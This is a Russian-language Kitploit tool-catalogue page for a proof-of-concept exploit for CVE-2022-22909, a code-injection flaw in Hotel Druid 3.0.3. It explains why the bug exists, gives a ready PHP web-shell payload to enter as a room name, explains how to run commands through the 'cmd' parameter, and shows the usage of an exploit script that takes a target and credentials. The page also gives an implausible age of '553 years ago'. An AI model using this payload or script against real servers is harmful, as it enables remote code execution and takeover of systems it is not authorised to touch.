Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-22909 — Hotel Druid 3.0.3: внедрение кода, приводящее к удаленному выполнению кода | Kitploit
Инструменты/GitHubGitHub/0z09e/cve-2022-22909
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHub0z09e/cve-2022-22909

CVE-2022-22909

Hotel Druid 3.0.3: внедрение кода, приводящее к удаленному выполнению кода

Репозиторий
553 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-22909

Описание

Уязвимость внедрения кода была обнаружена в приложении Hotel Druid v3.0.3, которую злоумышленник может использовать для удаленного выполнения кода на сервере. Для успешной эксплуатации злоумышленник должен иметь привилегию добавления новой комнаты.

Описание уязвимости

Уязвимость возникает из-за того, что названия комнат сохраняются в файл с именем /dati/selectappartamenti.php с использованием двойных кавычек.

root@kitploit:~
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Полезная нагрузка

Для успешной эксплуатации добавьте новую комнату со следующей полезной нагрузкой в качестве названия комнаты.

root@kitploit:~
{${system($_REQUEST[cmd])}}

После добавления новой комнаты перейдите на /dati/selectappartamenti.php и запустите веб-шелл, передав команду через параметр cmd.

Использование

root@kitploit:~
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

Пример

Если в приложении нет аутентификации. Используйте флаг --noauth для работы без аутентификации.

Если на сервере включена аутентификация, используйте --username и --password для аутентификации.

Авторы

Исследователь и автор PoC — 0z09e


Скачать инструмент